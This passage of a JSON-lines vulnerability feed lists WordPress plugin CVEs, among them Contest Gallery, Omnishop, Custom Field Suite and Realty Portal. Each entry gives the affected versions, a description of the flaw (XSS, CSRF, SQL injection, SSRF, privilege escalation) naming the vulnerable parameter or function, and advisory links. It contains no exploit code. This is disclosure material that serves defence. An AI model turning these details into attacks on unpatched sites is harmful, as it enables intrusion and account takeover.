page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frictionless\\\/trunk\\\/frictionless.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frictionless\\\/trunk\\\/frictionless.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frictionless\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frictionless\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1ec9dce-d0fb-4b7b-a8e4-4ccb474c9d57?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b1ec9dce-d0fb-4b7b-a8e4-4ccb474c9d57?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1662","slug":"url-media-uploader","versionImpact":"1.0.0","description":"The URL Media Uploader plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.0.0 via the 'url_media_uploader_url_upload' action. This makes it possible for authenticated attackers, with author-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/url-media-uploader\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/url-media-uploader\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae8f1852-2d67-4ed9-ab3d-5b3bf4083e06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ae8f1852-2d67-4ed9-ab3d-5b3bf4083e06?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3862","slug":"contest-gallery","versionImpact":"26.0.6","description":"Contest Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018id\u2019 parameter in all versions up to, and including, 26.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/tags\\\/26.0.5\\\/shortcodes\\\/cg_entry_on_off.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/tags\\\/26.0.5\\\/shortcodes\\\/cg_entry_on_off.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/tags\\\/26.0.7\\\/shortcodes\\\/cg_entry_on_off.php#L20\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contest-gallery\\\/tags\\\/26.0.7\\\/shortcodes\\\/cg_entry_on_off.php#L20\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288915\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288915\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contest-gallery\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/contest-gallery\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.contest-gallery.com\\\/documentation\\\/\",\"name\":\"https:\\\/\\\/www.contest-gallery.com\\\/documentation\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1b043a1-7bee-4ef0-86d9-19cf202cfc71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a1b043a1-7bee-4ef0-86d9-19cf202cfc71?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-50050","slug":"job-postings","versionImpact":"2.7.12","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BlueGlass Interactive AG Jobs for WordPress allows Stored XSS. This issue affects Jobs for WordPress: from n\/a through 2.7.12.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/job-postings\\\/vulnerability\\\/wordpress-jobs-for-wordpress-plugin-2-7-12-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/job-postings\\\/vulnerability\\\/wordpress-jobs-for-wordpress-plugin-2-7-12-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6214","slug":"omnishop","versionImpact":"1.0.9","description":"The Omnishop plugin for WordPress is vulnerable to Cross-Site Request Forgery on its \/users\/delete REST route in all versions up to, and including, 1.0.9. The route\u2019s permission_callback only verifies that the requester is logged in, but fails to require any nonce or other proof of intent. This makes it possible for unauthenticated attackers to delete arbitrary user accounts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/omnishop\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/omnishop\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7c936b8-3132-45e1-92ed-32ecdc9cbb1e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7c936b8-3132-45e1-92ed-32ecdc9cbb1e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2180","slug":"woocommerce-gateway-certification-de-facture-et-gestion-de-pdf-kiwiz","versionImpact":"2.1.3","description":"The KIWIZ Invoices Certification & PDF System WordPress plugin through 2.1.3 does not validate the path of files to be downloaded, which could allow unauthenticated attacker to read\/downlaod arbitrary files, as well as perform PHAR unserialization (assuming they can upload a file on the server)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4d3b90d8-8a6d-4b72-8bc7-21f861259a1b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4d3b90d8-8a6d-4b72-8bc7-21f861259a1b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2558","slug":"currency-switcher","versionImpact":"1.1.9","description":"The WPCS \u2013 WordPress Currency Switcher Professional plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpcs_current_currency shortcode in versions up to, and including, 1.1.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be054481-89b4-47d8-ad06-8622edea367f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be054481-89b4-47d8-ad06-8622edea367f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2911049\\\/currency-switcher\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2911049\\\/currency-switcher\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4407","slug":"custom-banners","versionImpact":"3.2.2","description":"The Custom Banners plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.2.2 This is due to missing or incorrect nonce validation on the saveCustomFields() function. This makes it possible for unauthenticated attackers to save custom fields via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f4c086d-8209-4212-9d91-67238c1a9143?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f4c086d-8209-4212-9d91-67238c1a9143?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473385%40custom-banners&new=2473385%40custom-banners&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2473385%40custom-banners&new=2473385%40custom-banners&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1537","slug":"essential-addons-for-elementor-lite","versionImpact":"5.9.9","description":"The Essential Addons for Elementor \u2013 Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Data Table widget in all versions up to, and including, 5.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81a48c61-4191-4252-9230-9df8fc5e3443?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/81a48c61-4191-4252-9230-9df8fc5e3443?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037755\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.10\\\/includes\\\/Elements\\\/Data_Table.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3037755\\\/essential-addons-for-elementor-lite\\\/tags\\\/5.9.10\\\/includes\\\/Elements\\\/Data_Table.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3643","slug":"newsletter-popup","versionImpact":"1.2","description":"The Newsletter Popup WordPress plugin through 1.2 does not have CSRF check when deleting list, which could allow attackers to make logged in admins perform such action via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/698277e6-56f9-4688-9a84-c2fa3ea9f7dc\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/698277e6-56f9-4688-9a84-c2fa3ea9f7dc\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3555","slug":"social-link-pages","versionImpact":"1.6.9","description":"The Social Link Pages: link-in-bio landing pages for your social media profiles plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the import_link_pages() function in all versions up to, and including, 1.6.9. This makes it possible for unauthenticated attackers to inject arbitrary pages and malicious web scripts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c025fc0-5dac-4a18-8338-fefb2a1fca5a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c025fc0-5dac-4a18-8338-fefb2a1fca5a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-link-pages\\\/trunk\\\/inc\\\/Admin.php#L462\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/social-link-pages\\\/trunk\\\/inc\\\/Admin.php#L462\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3561","slug":"custom-field-suite","versionImpact":"2.6.7","description":"The Custom Field Suite plugin for WordPress is vulnerable to SQL Injection via the the 'Term' custom field in all versions up to, and including, 2.6.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afc00118-e87e-475a-8ad6-b68d09ee2e44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/afc00118-e87e-475a-8ad6-b68d09ee2e44?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/fields\\\/term.php#L58\",\"name\":\"https:\\\/\\\/github.com\\\/mgibbs189\\\/custom-field-suite\\\/blob\\\/963dfcede18ff4ad697498556d9058db07d74fa3\\\/includes\\\/fields\\\/term.php#L58\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/mgibbs189.github.io\\\/custom-field-suite\\\/field-types\\\/term.html\",\"name\":\"https:\\\/\\\/mgibbs189.github.io\\\/custom-field-suite\\\/field-types\\\/term.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/en-gb.wordpress.org\\\/plugins\\\/custom-field-suite\\\/\",\"name\":\"https:\\\/\\\/en-gb.wordpress.org\\\/plugins\\\/custom-field-suite\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7356","slug":"zephyr-project-manager","versionImpact":"3.3.100","description":"The Zephyr Project Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018filename\u2019 parameter in all versions up to, and including, 3.3.100 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7fa63b7-2e7f-4ed5-96b9-ae06d429af47?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7fa63b7-2e7f-4ed5-96b9-ae06d429af47?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zephyr-project-manager\\\/trunk\\\/assets\\\/js\\\/core-admin.js#L2975\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zephyr-project-manager\\\/trunk\\\/assets\\\/js\\\/core-admin.js#L2975\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zephyr-project-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zephyr-project-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129917\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3129917\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9270","slug":"lenxel-core","versionImpact":"1.1","description":"The Lenxel Core for Lenxel(LNX) LMS plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e1d1283-3bd9-458e-81ca-9934b293415a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e1d1283-3bd9-458e-81ca-9934b293415a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lenxel-core\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lenxel-core\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11410","slug":"yoo-bar","versionImpact":"2.0.6","description":"The Top and footer bars for announcements, notifications, advertisements, promotions \u2013 YooBar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Yoo Bar settings in all versions up to, and including, 2.0.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yoo-bar\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yoo-bar\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64d6099e-2435-4a3a-9dcc-dba4a674c711?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/64d6099e-2435-4a3a-9dcc-dba4a674c711?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11607","slug":"gtpayment-donation","versionImpact":"1.0.0","description":"The GTPayment Donations WordPress plugin through 1.0.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/132b5193-156b-40b8-b5c7-08646e1f6866\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/132b5193-156b-40b8-b5c7-08646e1f6866\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12736","slug":"bu-section-editing","versionImpact":"0.9.9","description":"The BU Section Editing WordPress plugin through 0.9.9 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3c6a4c1-8358-4f8b-b58d-3f712052668f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d3c6a4c1-8358-4f8b-b58d-3f712052668f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25223","slug":"circle-image-slider-with-lightbox","versionImpact":"1.0.4","description":"The Team Circle Image Slider With Lightbox plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2061993%40circle-image-slider-with-lightbox&new=2061993%40circle-image-slider-with-lightbox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2061993%40circle-image-slider-with-lightbox&new=2061993%40circle-image-slider-with-lightbox&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/circle-image-slider-with-lightbox\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/circle-image-slider-with-lightbox\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd3e30ea-8f58-4895-b78c-fb18c94d5253?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd3e30ea-8f58-4895-b78c-fb18c94d5253?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-50010","slug":"zapier","versionImpact":"1.5.2","description":"Missing Authorization vulnerability in Zapier Zapier for WordPress allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Zapier for WordPress: from n\/a through 1.5.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/zapier\\\/vulnerability\\\/wordpress-zapier-for-wordpress-plugin-1-5-2-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/zapier\\\/vulnerability\\\/wordpress-zapier-for-wordpress-plugin-1-5-2-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6190","slug":"realty-portal-agent","versionImpact":"0.3.9","description":"The Realty Portal \u2013 Agent plugin for WordPress is vulnerable to Privilege Escalation due to missing authorization within the rp_user_profile() AJAX handler in versions 0.1.0 through 0.3.9. The handler reads the client-supplied meta key and value pairs from $_POST and passes them directly to update_user_meta() without restricting to a safe whitelist. This makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite the wp_capabilities meta and grant themselves the administrator role.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/realty-portal-agent\\\/trunk\\\/includes\\\/class-agent-process.php#L494\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/realty-portal-agent\\\/trunk\\\/includes\\\/class-agent-process.php#L494\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/realty-portal-agent\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/realty-portal-agent\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3adfe9e-ebdf-4a50-b60f-03a606a84ec0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3adfe9e-ebdf-4a50-b60f-03a606a84ec0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0253","slug":"real-media-library-lite","versionImpact":"4.18.28","description":"The Real Media Library: Media Library Folder & File Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via folder names in versions up to, and including, 4.18.28 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with author-level permissions and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/devowlio.gitbook.io\\\/changelogs\\\/wordpress-plugins\\\/real-media-library\",\"name\":\"https:\\\/\\\/devowlio.gitbook.io\\\/changelogs\\\/wordpress-plugins\\\/real-media-library\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/real-media-library-lite\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/real-media-library-lite\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/950d71ae-29a1-4b71-b74a-b1a5c9f3326e\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/950d71ae-29a1-4b71-b74a-b1a5c9f3326e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2179","slug":"woocommerce-order-status-change-notifier ","versionImpact":"1.1.0","description":"The WooCommerce Order Status Change Notifier WordPress plugin through 1.1.0 does not have authorisation and CSRF when updating status orders via an AJAX action available to any authenticated users, which could allow low privilege users such as subscriber to update arbitrary order status, making them paid without actually paying for them for example","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fbc56973-4225-4f44-8c38-d488e57cd551\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fbc56973-4225-4f44-8c38-d488e57cd551\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2557","slug":"currency-switcher","versionImpact":"1.1.9","description":"The WPCS \u2013 WordPress Currency Switcher Professional plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save function in versions up to, and including, 1.1.9. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to edit an arbitrary custom drop-down currency switcher.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2911049\\\/currency-switcher\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2911049\\\/currency-switcher\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4c79242-5c89-40c0-abcc-c112f7a64a74?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d4c79242-5c89-40c0-abcc-c112f7a64a74?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36750","slug":"ewww-image-optimizer","versionImpact":"5.8.1","description":"The EWWW Image Optimizer plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.8.1. This is due to missing or incorrect nonce validation on the ewww_ngg_bulk_init() function. This makes it possible for unauthenticated attackers to perform bulk image optimization via a forged request granted they can trick a site administrator into performing an action such as clicking on a 